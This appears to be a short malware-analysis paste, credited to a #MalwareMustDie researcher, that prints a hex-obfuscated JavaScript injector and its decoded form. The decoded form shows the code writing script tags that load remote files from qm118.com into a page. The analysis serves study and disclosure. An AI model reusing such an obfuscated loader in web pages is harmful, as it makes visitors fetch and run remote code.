window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\"\x74\x65\x78\x74\/\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x77\x77\x77\x2e\x71\x6d\x31\x31\x38\x2e\x63\x6f\x6d\/\x6a\x73\/\x69\x70\x74\x7a\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\"\x74\x65\x78\x74\/\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x77\x77\x77\x2e\x71\x6d\x31\x31\x38\x2e\x63\x6f\x6d\/\x6a\x73\/\x6c\x6c\x6a\x63\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\/\x62\x6f\x64\x79\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\/\x68\x74\x6d\x6c\x3e")


Deobfuscated:
 <! DOCTYPEhtmlPUBLIC"-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > 
 < htmlxmlns = "http://www.w3.org/1999/xhtml" > 
 < head > 
 < metahttp - equiv = "Content-Type"content = "text/html; charset=gb2312" /> 
 </ head > 
 < body > 
 < scripttype = "text/javascript"src = "http://www.qm118.com/js/iptz.js" ></ script > 
 < scripttype = "text/javascript"src = "http://www.qm118.com/js/lljc.js" ></ script > 
 </ body > 
 </ html > 

Author D.L 
twitter.com/it4sec
#MalwareMustDie
 
 Fuente:http://r00tsec.blogspot.mx/
 
Codigo: http://pastebin.com/raw.php?i=eJdSxTPB
 
Saludos Mundo Libre.